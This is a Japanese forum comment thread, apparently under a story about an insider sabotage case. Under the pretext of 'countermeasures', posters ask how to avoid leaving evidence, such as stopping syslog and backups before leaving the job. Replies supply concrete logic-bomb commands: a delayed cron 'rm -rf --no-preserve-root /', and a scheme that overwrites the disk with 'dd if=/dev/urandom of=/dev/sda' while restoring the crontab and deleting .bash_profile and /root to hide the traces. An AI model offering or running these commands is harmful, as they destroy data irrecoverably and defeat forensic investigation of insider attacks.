アカウント名:
パスワード:
退職前にsyslog停止、バックアップ停止退職後に無線LAN経由でアクセスしコマンドを実行
対策目的でいろいろな方法を教えてください。
cronで半年後に rm -rf --no-preserve-root /
その程度なら簡単なフォレンジック+尋問で割れそう。rm -rf で全てを消せる訳でもないし
/etc/cronにいずれかのタイミングで、dd if=/dev/urandom of=/dev/sda (別途データストレージがある場合は、当該データストレージ)を仕掛けておいて、/root/.bash_profileに念のためmv -f /root/crontab /etc/crontab (仕掛け前のcrontabに差し替え)rm -rf /root/.bash_profiledd if=/dev/urandom of=/dev/sda &rm -rf /rootを仕掛けておく?
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
犯人はmoriwaka -- Anonymous Coward
証拠を残さない方法はどんな方法がありますか? (スコア:0)
退職前にsyslog停止、バックアップ停止
退職後に無線LAN経由でアクセスしコマンドを実行
対策目的でいろいろな方法を教えてください。
Re:証拠を残さない方法はどんな方法がありますか? (スコア:0)
cronで半年後に rm -rf --no-preserve-root /
Re: (スコア:0)
その程度なら簡単なフォレンジック+尋問で割れそう。
rm -rf で全てを消せる訳でもないし
Re: (スコア:0)
/etc/cronにいずれかのタイミングで、
dd if=/dev/urandom of=/dev/sda (別途データストレージがある場合は、当該データストレージ)
を仕掛けておいて、/root/.bash_profileに念のため
mv -f /root/crontab /etc/crontab (仕掛け前のcrontabに差し替え)
rm -rf /root/.bash_profile
dd if=/dev/urandom of=/dev/sda &
rm -rf /root
を仕掛けておく?